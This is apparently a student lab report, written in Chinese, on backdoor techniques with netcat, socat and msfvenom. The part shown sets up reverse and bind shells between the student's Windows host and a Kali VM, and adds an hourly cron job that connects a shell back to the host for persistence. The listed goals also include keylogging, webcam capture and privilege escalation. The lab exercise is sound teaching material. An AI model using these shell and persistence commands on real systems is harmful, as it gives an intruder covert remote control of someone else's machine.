文章目录
20194307肖江宇Exp-2后门原理与实践
1.实验基础
本次实验需要我们掌握后门的基础知识,学习使用nc实现Windows,Linux之间的后门连接,学习使用Metaspolit的msfvenom指令生成简单的后门程序,学会MSF POST模块的应用。
1.1基础知识
后门的概念
后门就是不经过正常认证流程而访问系统的通道。后门可能出现在编译器中、操作系统中,最常见的是应用程序中的后门,还可能是潜伏于操作系统中或伪装成特定应用的专用后门程序
1.2常用后门工具
底层工具,进行基本的TCP、UDP数据收发,常常被与其他工具结合使用,起到后门的作用。
在Linux系统中一般自带netcat,使用man nc命令可以查看使用帮助
在Windows系统中,需要下载ncat.rar,解压后可使用
相当于Netcat++,一个超级Netcat工具。
在Windows下可以下载socat.rar,使用README作为参考。
任何代理、转发等功能都可以用该工具实现。
一个用来生成后门程序的程序。
它包含着后门的
- 基本功能(基本的连接、执行指令)
- 扩展功能(如搜集用户信息、安装服务等功能)
- 编码模式
- 运行平台
- 运行参数
它把后门的内容全部做成零件或可调整的参数,按需组合使用形成需要的可执行文件。
常见的Meterpreter
程序有
- intersect
- Metaspolit的
msfvenom
指令 - Veil-evasion
本次实验我们使用msfvenom
指令生成后门可执行文件Meterpreter。
2.实验目标
- 使用netcat获取主机操作Shell,cron启动
- 使用socat获取主机操作Shell,任务计划启动
- 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
- 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
- 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
实验环境
2.1实验环境
- 主机:Windows 10;
- 靶机:Kali Linux Debian 10;
在主机上用ipconfig
查看Windows10主机IP
主机IP为192.168.3.165
在Kali虚拟机中ifconfig
查看Kali虚拟机IP
Kali虚拟机IP为192.168.238.128
3.实验过程
3.1使用netcat获取主机操作Shell,cron启动
(1)在主机中获取虚拟机shell
在主机中使用ncat -l -p 4307
(个人学号后四位)监听本机的4307端口
在虚拟机中使用nc 192.168.3.165(主机IP) 4307 -e /bin/sh
连接主机反弹shell
成功getshell
(2)在虚拟机中获取主机shell
在虚拟机中用nc -l -p 4307
监听主机4307端口
在主机中用ncat -e cmd 192.168.238.128 4307
,
成功获取到主机shell
(3)在虚拟机中cron启动并在主机监听
在虚拟机上用crontab -e
指令编辑一条定时任务(crontab指令增加一条定时任务,-e表示编辑,输入2表示选择vim编辑器)
在最后一行添加0 * * * * /bin/netcat 192.168.3.165(主机IP) 4307 -e /bin/sh
,即在每个小时的第0分钟反向连接Windows主机的4307端口
等到每小时的0分,在ip地址为192.168.3.165的主机端用ncat -l -p 4307
打开4307端口监听即可
此外,也可以开一个非反弹式后门,在cron中写入nc -l -p 4307 -e /bin/sh
,这时攻击机能随时通过nc 主机ip 4307获得虚拟机的一个Shell